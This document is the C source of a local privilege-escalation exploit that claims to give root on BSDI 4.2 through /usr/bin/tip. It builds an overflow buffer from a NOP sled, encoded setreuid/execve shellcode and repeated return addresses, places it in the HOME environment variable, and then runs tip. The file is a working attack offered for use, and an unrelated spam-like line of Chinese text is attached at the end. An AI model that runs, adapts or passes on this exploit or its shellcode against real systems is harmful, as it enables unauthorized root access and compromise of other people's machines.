/* !DO NOT DISTRIBUTE! !HHP PRIVATE SOURCE ONLY! * * qtip.c :: (BSDI 4.2) /usr/bin/tip local root exploit. * * Author: Cody Tubbs (loophole of hhp). * Site: http://www.hhp-programming.net/ * Email: pigspigs@yahoo.com * Date: 6/15/2001. 2:12:54AM CST. * * Requires access to tip, usualy gid(dialer). * ps... sup tip? submitted by tarsin (robbie gubler) * or something of the like. */ #include #define OSET -288 //Worked for me... static char shellcode[]= //BSDI self-decoding execve-setreuid shellcode. "\xeb\x0c\x5e\x31\xc9\xb1\x27\xfe\x0e\x46\xe2\xfb\xeb\x05\xe8\xef\xff" "\xff\xff\x32\xc1\x52\x52\xb1\x7f\xe9\x15\x01\x01\x01\x69\x30\x30\x74" "\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x52\x54\x52\x55\x54\x51\xb1\x3c\x9b" "\x01\x01\x01\x01\x08\x01\xc4"; //...... Author: bighawk[@warfare.com] long get_sp(void){__asm__("movl %esp,%eax");} int main(int argc, char **v){ char eip[268]; int cont, i; long retaddr, oset=0; fprintf(stderr,"(BSDI 4.2) /usr/bin/tip local root exploit.\n"); if(argc>1){oset=atoi(v[1]);}else{oset=OSET;} retaddr=get_sp()+oset; fprintf(stderr,"Ret-addr %#x, offset: %d, align: 0.\n",retaddr,oset); memset(eip,0x90,sizeof(eip)); memcpy(eip+162,shellcode,strlen(shellcode)); for(i=224;i<268;i+=4){*(long *)&eip[i]=retaddr;} setenv("HOME",eip,1); execl("/usr/bin/tip","tip","0",0); }

亚洲欧美在线